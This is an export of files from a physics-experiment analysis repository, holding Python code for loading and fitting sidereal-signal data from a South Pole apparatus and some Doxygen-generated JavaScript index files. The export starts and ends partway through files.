correlationAmp.sig[:,1].ravel()[yI2]*sin(2*correlationAmp.theta[:,1].ravel()[yI2]), err2h.ravel()[yI2], *cor2hAxs)\r\n subplot(gs[4]).plot(correlationAmp.t[:,1].ravel(), correlationAmp.chi2[:,1].ravel(),'o')\r\n\r\n #chi2Axs=MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel(), correlationAmp.chi2[:,0].ravel(), subplotSpec=gs[2], sharexs=[pointAxs[0],None])\r\n\r\n if not MT.nearby_angles(thetaRef, 0, 0.1):\r\n corAxs[0].set_title('Reference angle: {0}'.format(thetaRef/pi*180))\r\n #tight_layout()\r\n \r\ndef view_sidereal(seqTup, sidFitTup, labFrameTup=None):\r\n \"\"\"Not functional anymore\r\n \"\"\"\r\n figure()\r\n fx=lambda th, ax: ax*sin(th)\r\n fy=lambda th, ay: ay*cos(th)\r\n f=lambda th, ax, ay: ax*sin(th) + ay*cos(th)\r\n\r\n gs=GridSpec(2,1)\r\n sigAxs=MT.plot_errorbar_and_hist(seqTup.t.ravel(), seqTup.sig.ravel(), seqTup.err.ravel(), subplotSpec=gs[0])\r\n if seqTup.chi2 is not None:\r\n chiAxs=MT.plot_scatter_and_hist(seqTup.t, seqTup.chi2, gs[1])\r\n chiAxs[0].set_title(r'$\\chi^2$')\r\n\r\n\r\n sigRot=MT.rotMat2d(-sidFitTup.labTheta[0]).dot(sidFitTup.sig)\r\n errRot=abs(MT.rotMat2d(-sidFitTup.labTheta[0]).dot(sidFitTup.err)) #This is very fragile- should do full covariance in here.\r\n sigAxs[0].plot(seqTup.t, f(2*pi*seqTup.t + 0*sidFitTup.labTheta[0], *sidFitTup.sig),\r\n label=\"$X$:{:.3} $\\pm$ 
{:.3}, $Y$:{:.3} $\\pm$ {:.3}\".format(\r\n sigRot[0,0], errRot[0,0], sigRot[0,1], errRot[0,1])\r\n )\r\n sigAxs[0].legend()\r\n sigAxs[0].set_title('Sidereal Signal (lab: $S_{0:.3}={1:.3} \\pm {2:.3}$, $S_{3:.3}= {4:.3} \\pm {5:.3}$'.format(\r\n labFrameTup.labTheta[0]/pi*180, labFrameTup.sig[0], labFrameTup.err[0], \r\n labFrameTup.labTheta[1]/pi*180, labFrameTup.sig[1], labFrameTup.err[1] ))\r\n \r\n #Could also do another here if we're fitting both\r\n #bothAx1.legend()\r\n\r\n if 0:\r\n for T, A, LV in ([seqT_0, seqSig1_0, sidAmp0], [seqT_90, seqSig1_90, sidAmp90]):\r\n if len(A)>3:\r\n axLV.plot(T, f(2*pi*T+ LV[0][0] -0*thetaRef, *LV[1] ), label=\"$_X$:{:.3} $\\pm$ {:.3}, $_Y$:{:.3} $\\pm$ {:.3}\".format(LV[1][0], sqrt(LV[2][0]), LV[1][1], sqrt(LV[2][1])))\r\n else:\r\n vprint(\"Need at least 3 sequence points\")\r\n axLV.text( 0.5, 0.05, r'$\\theta_0 = {:.3}$'.format(thetaRef/pi*180), bbox=dict(facecolor='grey', alpha=0.1), transform=axLV.transAxes, fontsize=16)\r\n axLV.legend(loc=0)\r\n\r\ndef combine_angle_amps(ampL, plot=False):\r\n\r\n ampL=[amp for amp in ampL if amp is not None]\r\n ts = [ sAmp.t for sAmp in ampL]\r\n if ampL:\r\n #Might not rotate in this case, but just in case\r\n (ths, ys, covs)= zip(*[ MT.rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in ampL if sAmp is not None])\r\n ys=array(ys)\r\n if covs[0].ndim>1:\r\n errs=array([sqrt(cov.diagonal()) for cov in covs]) #cheat and throw away off-diagonals\r\n else:\r\n errs=array(covs)\r\n\r\n\r\n ts=array(ts)\r\n if ts.ndim < ys.ndim:\r\n ts=tile(ts[:,newaxis],2)\r\n mn, wEr, apparentUnc, chi2= MT.weightedStats(ys, 1./(errs**2), axis=0, bReturnChi2=True)\r\n varSclFact=where( (chi2>1.) & (~isinf(chi2)), chi2, 1.)\r\n #calcedUnc=sqrt(nansum(errs**2,axis=0)/sum(~isnan(errs))**2)\r\n calcedUnc=1/sqrt(nansum(1/errs**2,axis=0))\r\n combAmp=SiderealFitData(mean(ts), mn, diag(calcedUnc**2*varSclFact), chi2, [0,pi/2], [0,pi/2], None) \r\n else:\r\n ts=ys=errs=array([])\r\n combAmp=None #SiderealFitData(*(7*[None]))\r\n if plot:\r\n if isinstance(plot, Axes):\r\n axL=[plot, plot]\r\n elif hasattr(plot, \"__getitem__\"):\r\n axL=plot #assume it's a list with two axes\r\n else:\r\n figure()\r\n axL=[gca(), gca()]\r\n\r\n for t, y, e, ax in zip(ts.T, ys.T, errs.T, axL):\r\n ax.errorbar( t, y, e, fmt='.') \r\n axL[0].set_title('x')\r\n axL[1].set_title('y')\r\n\r\n #gdInd=~(isnan(ys) | isinf(ys) | isinf(errs))\r\n #ys=ys[gdInd]\r\n #errs=errs[gdInd]\r\n #if sum(~isnan(errs)) <1:\r\n #return None\r\n #sm.WLS(\r\n \r\n return combAmp\r\n #return mn, calcedUnc, apparentUnc, wEr, chi2\r\n\r\ndef spSearchSet(timestamp, rSpec, sigWindow, bgWindow, startTime=-inf, endTime=inf, bPlotAll=True ): \r\n '''\r\n Todos:\r\n - Filter out sequence points by chi squared, error bar, or even deviation from the mean\r\n - Low pass filter first, then look at slope or remaining RMS for weighting value\r\n - Histogram the string points and try to find any common signature to the outliers\r\n - Do a multiple regression for the correlation data vs the signal data\r\n - Output extra details like 'cosmic' angle, and mean signal in the lab-frame.\r\n '''\r\n ####################LOAD DATA##########################\r\n if hasattr(timestamp, 'fastD'): #If we've actually been handed a dataset, not a timestamp\r\n D=timestamp\r\n else: #Load one\r\n D=SPDataSet(timestamp, startTime=startTime, endTime=endTime)\r\n\r\n ###################CUT AND PROCESS INTO POINTS###################\r\n rawAmp0=RawData(t=D.fastD[0], sig=D.fastD[1])\r\n 
trigTimes=makeTriggers(D.fastD[0], rSpec, bIncludeExtraRot=True);\r\n cutAmp=preprocess_raw(rawAmp0, trigTimes, sigWindow)\r\n pointAmp=process_raw(cutAmp)\r\n if bPlotAll:\r\n view_raw(rawAmp0, cutAmp, trigTimes)\r\n\r\n #################### FILTER OUT BAD POINTS#######################\r\n if 0:\r\n filterSensorNameL= ['Tilt Sensor 1'],\r\n rawSig, badM= filterBySensors(cutAmp,\r\n sensDataL=getSensors(D, filterSensorNameL),\r\n bView= bPlotAll)\r\n \r\n ##################PROCESS BY SEQUENCE (CORRELATION)####################\r\n seqAmp=process_points(D.apparatusAngles, pointAmp, cutAmp )\r\n #view_correlations(seqAmp)\r\n\r\n ################PROCESS ALL SEQUENCES, I.E. WHOLE SET####################\r\n ## Divide the sequences into groups (e.g. EW and NS) and process them, returning also the lab-fram numbers\r\n labAmps, sidAmps, seqAmps= split_and_process_sequences(seqAmp)\r\n\r\n view_sidereal(seqAmps[0], sidAmps[0] )\r\n view_sidereal(seqAmps[1], sidAmps[1] )\r\n view_sidereal(seqAmps[2], sidAmps[2] )\r\n\r\n\r\n return labAmps, sidAmps#, sidAmpAlt\r\n\r\nif __name__==\"__main__\":\r\n from pylab import *\r\n from scipy import random\r\n\r\n\r\n if 0:\r\n # Check string analysis:\r\n N=10000\r\n t=linspace(0,10,N)\r\n dat=(arange(N)%2 -0.5)*1\r\n dat+=random.normal(0, size=N)\r\n\r\n plot(t,dat)\r\n vprint(stringAnalysis(t, dat, ones(N)*0.5))\r\n \r\n if 0: #Check MakeTestData\r\n bTest=True\r\n dat=MakeTestData(RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=90), amp=1, sigma=0.01, zeroingTime=500)\r\n\r\n if 0:\r\n D=loadSet('5348.82', startTime=5348.86)\r\n nameL=['Tilt Sensor 1']\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n [ts1]=getSensors(D, nameL)\r\n #out=sliceReduceData( ts1[0], ts1[1], \r\n #trigTimes + secs2sd(sigWindow.offset), secs2sd(sigWindow.duration) )\r\n window=Window(offset=-5.0, duration=4)\r\n trigTimes=makeTriggers(ts1[0], rSpec, bIncludeExtraRot=True);\r\n ts1Ts, [_, ts1CutSig, ts1CutErr], ts1CutIndxL = sliceReduceData( ts1[0], ts1[1], trigTimes + secs2sd(window.offset), secs2sd(window.duration) ) \r\n #M=nanmean(ts1CutSig.ravel())\r\n badM, ts1SM=MT.findOutliers(ts1CutSig.ravel(), windowLen=50, sigmas=3, bReturnMeanLine=True)\r\n figure()\r\n #as\r\n plot(ts1Ts.ravel(), ts1CutSig.ravel(),'.')\r\n plot(ts1Ts.ravel()[badM], ts1CutSig.ravel()[badM],'.')\r\n plot(ts1Ts.ravel(), ts1SM, lw=2)\r\n if 0: #Check analysis\r\n timestamps=[\r\n '5227.40',\r\n #'5310.41',\r\n #'5318.41',\r\n #'5348.86',\r\n ]\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n res=spSearchSet(\r\n MakeTestData(rSpec, amp=10.05, sigma=2, N=800000, phi=-0.15*pi, zeroingTime=30, fracDev=0.00, sizeDev=50.0),\r\n rSpec,\r\n Window(offset=-3, duration=2), Window(offset=-1,duration=1),\r\n bPlotAll=True,\r\n )\r\n if 0:\r\n from SPDataSet import SPDataSet\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n sd,sig=makeTestData(\r\n rSpec, amp=10.05, sigma=2, N=800000, phi=-0.15*pi, zeroingTime=30, fracDev=0.00, sizeDev=50.0)\r\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec )\r\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.625, "avg_line_length": 23, "blob_id": "99c870f8e2fc12716fadaa931f6bae7d76a88554", "content_id": "e9b118572573767a4e563f9f2021bdf5d338270f", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "JavaScript", "length_bytes": 96, "license_type": "no_license", "max_line_length": 74, "num_lines": 4, "path": "/html/search/files_3.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['loadspfiles_2epy',['loadSPFiles.py',['../loadSPFiles_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "2dad3751b53ca52b9e95d36e52e49c28ed13565f", "content_id": "35fbc695a001cb123f4a7e594531d46fe59d4729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 36, "num_lines": 3, "path": "/README.md", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "# spcpt-analysis\nanalysis stuff for spcpt\nAnd practising git-hubby workflow...\n" }, { "alpha_fraction": 0.6629213690757751, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 43.75, "blob_id": "86f26382f00189265dbdddea75517188ae4de816", "content_id": "974639895fed73867892e72c2433fff233f86cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 178, "license_type": "no_license", "max_line_length": 123, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages =\n[\n [ \"pr\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr\" ]\n];" }, { "alpha_fraction": 0.5541343092918396, "alphanum_fraction": 0.572864294052124, "avg_line_length": 36.3731689453125, "blob_id": "fbc493224826fd944a72930cf3fe7abe0090e96e", "content_id": "1117340474039f1936d1ed358dcd2accf4ee5703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15323, "license_type": "no_license", "max_line_length": 210, "num_lines": 410, "path": "/loadSPFiles.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"Functions for loading data files from the SP experiment\n\n\"\"\"\nimport numpy as np\nfrom os import path\nimport os\nimport re\nfrom collections import namedtuple\nimport yaml\nimport MT\nimport convert\n\nrelaxedNames=\"\"\"Tot Pos Det\nTot Pos Det 2\nTot Pos Det 3\nCell Temp\nFerrite Temp\nOven Temp\nTemperature Controller Output\nBreadboard Temp\nRoom Temp\nG10 Lid Temp\nTilt Sensor 1\nTilt Sensor 2\nWavelengthErr\nPump Current Mon\nPump Temp Mon\nProbe Current Mon\nProbe Temp Mon\nWater Flow\nApparatus Position\n\"\"\".splitlines()\nmediumNames=\"\"\"Accelerometer\nPosition Purple\nPosition Green\nFluxgate X\nFluxgate Y\nFluxgate Z\nTiltmeter X\nTiltmeter Y\nVert Pos Det\nHoriz Pos Det\nVert Pos Det 2\nHoriz Pos Det 2\nVert Pos Det 3\nHoriz Pos Det 3\n\"\"\".splitlines()\n\ndef getSpinningDataNames(timestamp, bMotorData=False):\n if not bMotorData:\n base_name='SP_aparatus {0}'.format(timestamp)\n else:\n base_name='SP_motor {0}'.format(timestamp)\n base_dir=os.path.join(os.getenv('SP_DATA_DIR'), base_name + ' Bundle/')\n return base_dir, base_name\n\ndef getAllTimeStamps(bApparatus=True, bMotor=False):\n data_dir=os.path.join(os.getenv('SP_DATA_DIR'))\n ap_dir_regex=re.compile('SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n mo_dir_regex=re.compile('SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n\n regExL=[]\n if 
bApparatus:\n regExL.append(ap_dir_regex)\n if bMotor:\n regExL.append(mo_dir_regex)\n outL=[]\n for reg in regExL:\n match_list=[ap_dir_regex.match(line) for line in os.listdir(data_dir)]\n stamps=[m.groups()[0] for m in match_list if m is not None]\n stamps.sort()\n outL.append(stamps)\n if len(outL)==1:\n outL=outL[0]\n return outL\n\n#old\ndef loadSet(timestamp, cal=None, subL=[\"Fast\", \"Medium\", \"Relaxed\"], startTime=-np.inf, endTime=np.inf):\n \"\"\"OLD Load all the data associated with @timestamp\n \"\"\"\n if cal is None:\n print(\"Haven't implemented loading of calibration data yet, Your data will stay in Volts\")\n cal=1\n base_dir, base_name=getSpinningDataNames(timestamp)\n\n def splitRecArray(rA):\n t=rA['sd']\n names=list(rA.dtype.names)\n names.remove('sd')\n y=rA[names].view(rA.dtype[-1]).reshape(rA.size,-1)\n return [t, y.T, names]\n\n #startI=0\n fastD=None;\n medD=None; \n relD=None;\n if \"Fast\" in subL:\n fastRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Fast'), totalDataType=[('sd','>f8'), ('s1', '>f4')]) \n if fastRec is not None:\n fastD=splitRecArray(fastRec)\n fastD[1]=fastD[1].squeeze()\n fastD[1]*=cal\n\n startI, endI=fastD[0].searchsorted([startTime, endTime])\n fastD[0]=fastD[0][startI:endI]\n fastD[1]=fastD[1][startI:endI]\n\n if \"Medium\" in subL:\n medRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Medium'), useMetaFile=True) \n if medRec is not None:\n renameFieldMaybe(medRec, 'Sidereal Days', 'sd')\n medD=splitRecArray(medRec)\n startI, endI=medD[0].searchsorted([startTime, endTime])\n medD[0]=medD[0][startI:endI]\n medD[1]=medD[1][:,startI:endI]\n\n\n\n if \"Relaxed\" in subL:\n relRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Relaxed'), useMetaFile=True) \n if relRec is not None:\n renameFieldMaybe(relRec, 'Sidereal Days', 'sd')\n relD=splitRecArray(relRec)\n startI, endI=relD[0].searchsorted([startTime, endTime])\n relD[0]=relD[0][startI:endI]\n relD[1]=relD[1][:,startI:endI]\n if \"Slow\" in subL:\n slRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Slow'), useMetaFile=True) \n if slRec is not None:\n renameFieldMaybe(slRec, 'Sidereal Days', 'sd')\n slD=splitRecArray(slRec)\n\n return SPDataSet(fastD, medD=medD, relD=relD)\n\nset_info_defaults={\n 'bUseful': 'unknown',\n 'bDataConfirmed':False,\n 'acquisition':{'sampleRate': 50, 'timeConstant': 0.003},\n #'rotationSpec':{'delay': 9, \n # 'interval':30, \n # 'numRotations':20,\n # 'rotAngles': [-180],\n # 'extraRotAngle': -90.,\n # 'startingAngle': 0,\n # },\n 'timeStamp':'unknown',\n 'notes': 'Default',\n #'windows':{}\n 'windows':{\n 'sig':{\n 'duration': 4,\n 'offset': -6.6,\n },\n 'bg':{\n 'duration': 1,\n 'offset': 0,\n },\n }\n }\ndef loadSetInfo(dir_name):\n ts=dir_name.split()[-2]\n bWriteNew=False\n filepath=os.path.join(dir_name, 'set_info.yaml')\n try:\n f=open(filepath)\n infoD=yaml.load(f)\n f.close()\n except IOError:\n print(\"No set_info.yaml exists in {}, making defaults\".format(dir_name))\n bWriteNew=True\n infoD= {}\n\n loadedKeys=infoD.keys()\n if 'bandwidth' in loadedKeys: #It's a matlab generated yaml file\n print(\"updating matlab generated yaml\")\n #newD=copy(set_info_defaults)\n newD={\n 'bUseful':infoD['bUseful'],\n 'bDataConfirmed':infoD['bDataConfirmed'],\n 'acquisition':{'sampleRate': infoD['bandwidth'][1], \n 'timeConst': infoD['bandwidth'][0]\n },\n 'rotationSpec':{'delay': infoD['delay'], 'interval':infoD['interval'],\n 'numRotations':infoD['numRotations'], \n 'rotAngles': 
[infoD['rotationAngles'][0]], \n 'extraRotAngle':infoD['rotationAngles'][1],\n 'startingAngle':MT.cardinalToDeg(infoD['startPosition']),\n },\n 'timeStamp':infoD['timestamp'],\n 'notes':infoD['notes']+'\\nConverted from matlab',\n }\n infoD=newD\n writeSetInfo(dir_name, infoD)\n \n if infoD.has_key('rotationSpec') and infoD['rotationSpec'].has_key('startPosition'):\n infoD['rotationSpec']['startingAngle']= MT.cardinalToDeg(infoD['rotationSpec']['startPosition'])\n infoD['rotationSpec'].pop('startPosition')\n\n newLoadedKeys=infoD.keys()\n for key in set_info_defaults.keys():\n if key not in newLoadedKeys:\n infoD[key]=set_info_defaults[key]\n print(\"Loading {0} from defaults, it may not be right. Go fix this in set_info.yaml!\".format(key))\n\n if bWriteNew:\n infoD['timeStamp']=ts\n writeSetInfo(dir_name, infoD)\n return infoD\n\ndef writeSetInfo(dir_name, D):\n filepath=os.path.join(dir_name, 'set_info.yaml')\n print(\"writing new set_info.yaml file...\")\n fout=open(filepath,'w')\n fout.write(yaml.dump(D))\n fout.close()\n print(\"{0} was written.\".format(filepath))\n\ndef loadZeroFile(fname):\n proc_dict={\n 1: 'cBz',\n 2: 'By',\n 3: 'Bx',\n 35: 'Cal',\n 29: 'Pol',\n }\n dat=np.loadtxt(fname).T;\n t=dat[0]\n proc_num=dat[1]\n val=dat[2]\n slope=dat[3]\n sigma=dat[4]\n ZeroProc=namedtuple('ZeroProc', ['t', 'val', 'slope', 'sigma'])\n zD={}\n for num, name in proc_dict.iteritems():\n I=np.where(proc_num==float(num))[0]\n zD[name]=ZeroProc(t=t[I], val=val[I], slope=slope[I], sigma=sigma[I])\n #DataFrame =namedtuple('DataFrame', ['sd', 'y'])\n return zD\n\n\ndef getAllSPSensor(names, slc=None, timeRange=None):\n data_dir=os.path.join(os.getenv('SP_DATA_DIR'))\n ap_dir_regex=re.compile('SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n mo_dir_regex=re.compile('SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n\n ap_match_list=[ap_dir_regex.match(line) for line in os.listdir(data_dir)]\n ap_stamps=[m.groups()[0] for m in ap_match_list if m is not None]\n mo_match_list=[mo_dir_regex.match(line) for line in os.listdir(data_dir)]\n mo_stamps=[m.groups()[0] for m in mo_match_list if m is not None]\n\n mo_stamps.sort()\n ap_stamps.sort()\n ioff()\n sdL=[]\n if slc is None:\n [firstI, lastI]=searchsorted(ap_stamps, timeRange)\n slc=slice(firstI, lastI)\n #slc=slice(-20,-15)\n relIdxs=[relaxedNames.index(name) for name in names if name in relaxedNames]\n medIdxs=[mediumNames.index(name) for name in names if name in mediumNames]\n #slIdxs=[slowNames.index(name) for name in names if name is in slowNames]\n #medList=[idx for name in names if name is in mediumNames]\n #slList=[idx for name in names if name is in slNames]\n\n allMedL=[]\n allRelL=[]\n subSetL=[]\n if medIdxs:\n subSetL.append(\"Medium\")\n if relIdxs:\n subSetL.append(\"Relaxed\")\n \n for stamp in ap_stamps[slc]:\n thisTsYL=[]\n dat=loadSet(stamp, subL=subSetL)\n relL=[]\n medL=[]\n #tsL=[]\n for idxs, D, l in [(relIdxs, dat.relD, relL), (medIdxs, dat.medD, medL)]:\n if idxs and D:\n l.append([D[0]]+[D[1][idx] for idx in idxs])\n #tsL.append(D[0])\n #else:\n #tsL.append(None)\n #l.append(None)\n \n if medL:\n allMedL.append(medL)\n if relL:\n allRelL.append(relL)\n\n if 0:\n try:\n dat=loadSet(stamp, subL=subSet)\n if subSet=='Relaxed':\n D=dat.relD\n elif subSet=='Medium':\n D=dat.medD\n elif subSet=='Slow':\n D=dat.slowD\n if D:\n sd=D[0].copy()\n y=D[1][D[2].index(name)].copy()\n del dat\n sdL.append(sd)\n yL.append(y)\n \n except ValueError:\n print(\"\\nTimestamp {0} didn't load, maybe no '{1}' data? 
\\n \\n\".format(stamp, subSet))\n if allRelL:\n allRelL=dstack(allRelL).squeeze()\n if allMedL:\n allMedL=dstack(allMedL).squeeze()\n return allMedL, allRelL\n\ndef loadBins(root_path, useMetaFile=True, nVars=1, endian='', dType=None, totalDataType=None):\n \"\"\"Load all the binary files in that match the root path.\n\n They match the root path with regex 'root_path( \\d+)?.bin',\n that is anything that starts with root_path, ends with .bin, and optionally has a number after a space. If there are numbers after the space, the files are loaded and the data appended in the correct order.\n \"\"\"\n dirname=path.dirname(root_path) \n rootname=path.basename(root_path) \n r=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n dlist=os.listdir(dirname);\n dlist=[st for st in dlist if r.match(st)]\n if not dlist:\n print(\"No data for {0}\".format(root_path))\n return None\n if len(dlist)>1:\n dlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n \n dat_list=[loadABin(path.join(dirname, fname), useMetaFile=useMetaFile, nVars=nVars, endian=endian, totalDataType=totalDataType) for fname in dlist]\n # Combine these into a single file...\n\n dat=np.hstack(dat_list)\n #datnames=dat_list[0].keys()\n return dat\n\ndef loadABin(filepath, nVars=1, useMetaFile=True, endian='', totalDataType=None):\n \"\"\"Load a single binary file at filepath\n \"\"\"\n #This is all just establishing how the data is stored in the file\n if totalDataType is None: #If a data type wasn't given, we'll try to work it out:\n if useMetaFile: #Usually the data type is stored in a meta file: \n fname_components=path.splitext(filepath)[0].split(' ')\n if fname_components[-1].isdigit():\n fname_components.pop()\n meta_file_path=' '.join(fname_components) + '.npmeta'\n npmeta_path=' '.join(fname_components) + '.npmeta'\n if path.exists(npmeta_path):\n mfile=open(npmeta_path)\n lines=mfile.readlines()\n pairs=[line.strip().split(',') for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n defaultDtype='>f4'\n totalDataType=[]\n for p in pairs:\n name=p[0].strip()\n if len(p)>1:\n dt=p[1].strip()\n defaultDtype=dt;\n else:\n dt=defaultDtype;\n totalDataType.append((name, dt));\n else: #If there was no appropriate unambiguous meta-file, look for the old style:\n meta_file_path=' '.join(fname_components) + '.meta'\n if not path.exists(meta_file_path): #Sometimes they have the extension .meta.txt for no good reason, so check for that too\n meta_file_path=meta_file_path+'.txt'\n if path.exists(meta_file_path):\n convert.spmeta2npmeta(meta_file_path) #This convert the old style to the new (Corrects for some changes, but not all)\n print(\"Found an old meta-file only. 
Will attempt to make something useful out of it (old style is ambiguous)\")\n return loadABin(filepath, nVars, useMetaFile) #We'll run the function again with the new meta file exists\n #mfile=open(meta_file_path)\n else:\n raise IOError(\"Looking for a meta-file (for {0}) but none exists\".format(' '.join(fname_components)))\n sigNames=mfile.readlines()\n sigNames=[name.strip() for name in sigNames]\n if sigNames[0]=='Sidereal Days':\n sigNames=sigNames[1:]\n nVars=len(sigNames)\n sigDataType=[(name, endian+'f8') for name in sigNames]\n timeDataType=[('sd', endian+'f8')]\n totalDataType=timeDataType+sigDataType\n\n else:\n timeDataType=[('sd', endian+'f8')]\n sigDataType=[('s{0}'.format(n), endian+'f8') for n in range(1,nVars+1)]\n totalDataType=timeDataType+sigDataType\n\n # This is where we actually read it\n dat=np.fromfile(filepath, totalDataType)\n\n return dat;\n\nif __name__==\"__main__\":\n #ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n #fpath=ddir+'SP_motor 5253.67 sensors 8.bin'\n ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5256.38 Bundle/'\n #ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5256.38 Bundle/'\n fname='SP_aparatus 5256.38 Medium 6.bin'\n fname_f='SP_aparatus 5256.38 Fast'\n ddir2='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n fname2='SP_motor 5253.67 sensors'\n fpath=ddir+fname\n fpath_f=ddir+fname_f\n\n dat=loadABin(fpath, useMetaFile=True);\n dat_f=loadBins(fpath_f, useMetaFile=False, totalDataType=[('sd','>f8'), ('s1', '>f4')]);\n dat2=loadBins(ddir+'SP_aparatus 5256.38 Medium')\n dat3=loadBins(ddir2+fname2, useMetaFile=True)\n" }, { "alpha_fraction": 0.5151515007019043, "alphanum_fraction": 0.747474730014801, "avg_line_length": 38.79999923706055, "blob_id": "95325e259805eeddf59c6316700861c7fb46c593", "content_id": "dc817205228aaf7ba7dcc520eca7130b15295faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 198, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/html/convert_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var convert_8py =\n[\n [ \"allDirsSpmeta2Npmeta\", \"convert_8py.html#a98b540877656803471dddb9a87fce779\", null ],\n [ \"spmeta2npmeta\", \"convert_8py.html#af9f80b1ee66d98e05cf941352cdda54d\", null ]\n];" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 24.5, "blob_id": "e5361f639e92a0e7458b8923323d5c459d1c4a41", "content_id": "709e18404a0e2ce1e2fbf582ad4d7dffc5c8065c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 102, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/html/search/files_6.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['test_5fspfuncs_2epy',['test_SPfuncs.py',['../test__SPfuncs_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.4693813621997833, "alphanum_fraction": 0.7863221168518066, "avg_line_length": 74.71146392822266, "blob_id": "b3344841d292396b5492f4fc88159d8d21cb10d4", "content_id": "d2d3edd2f25f706bb57d4b722c6d5c7c3340a37d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 19155, "license_type": "no_license", 
"max_line_length": 134, "num_lines": 253, "path": "/html/navtreeindex0.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var NAVTREEINDEX0 =\n{\n\"SPDataSet_8py.html\":[2,0,8],\n\"SPDataSet_8py.html#a296fa19993c2ac2fa6db975b8b0f6b88\":[2,0,8,3],\n\"SPDataSet_8py.html#a2e421078d46e1d8f3b0c2d7c8211e1a2\":[2,0,8,23],\n\"SPDataSet_8py.html#a3c7145cc42e7ec16a596f5996a8e70e2\":[2,0,8,16],\n\"SPDataSet_8py.html#a5a94fa78adaa1ce53cae1e69c7a10c1f\":[2,0,8,4],\n\"SPDataSet_8py.html#a6b49ba99ee674be07d78e57e0d6a4506\":[2,0,8,17],\n\"SPDataSet_8py.html#a794711a619d88291abbe1c9c29396b5b\":[2,0,8,18],\n\"SPDataSet_8py.html#a7ef84c87edaf55c60c75aa4a6b63fabf\":[2,0,8,19],\n\"SPDataSet_8py.html#a9d0e07e3e1f4360be4f8c59927abe142\":[2,0,8,2],\n\"SPDataSet_8py.html#a9dcba74d2fb20a6a41c191302ec5136b\":[2,0,8,15],\n\"SPDataSet_8py.html#aa23a4db7857d6d485ae098e21e29cf59\":[2,0,8,6],\n\"SPDataSet_8py.html#aa809f797a727977783e89201eb7515ba\":[2,0,8,21],\n\"SPDataSet_8py.html#aaa1cf30f24f4635798c2ac9ab8cb991f\":[2,0,8,20],\n\"SPDataSet_8py.html#aae98530dd28697279534ad7dd042acd8\":[2,0,8,5],\n\"SPDataSet_8py.html#ab3e94a5db004f2a1cbe3b89005731d7c\":[2,0,8,12],\n\"SPDataSet_8py.html#ab977d64bf78ed1ce32101398d66e2673\":[2,0,8,22],\n\"SPDataSet_8py.html#abc13a280637f719ae917c9f2cf2d9d47\":[2,0,8,10],\n\"SPDataSet_8py.html#ac07feedd7af03661a0925bdec0d1f1fe\":[2,0,8,11],\n\"SPDataSet_8py.html#acf5db24745ff3b8a02816869e9b10482\":[2,0,8,7],\n\"SPDataSet_8py.html#ae343b1ec862928d74ae9f6e140008b0d\":[2,0,8,13],\n\"SPDataSe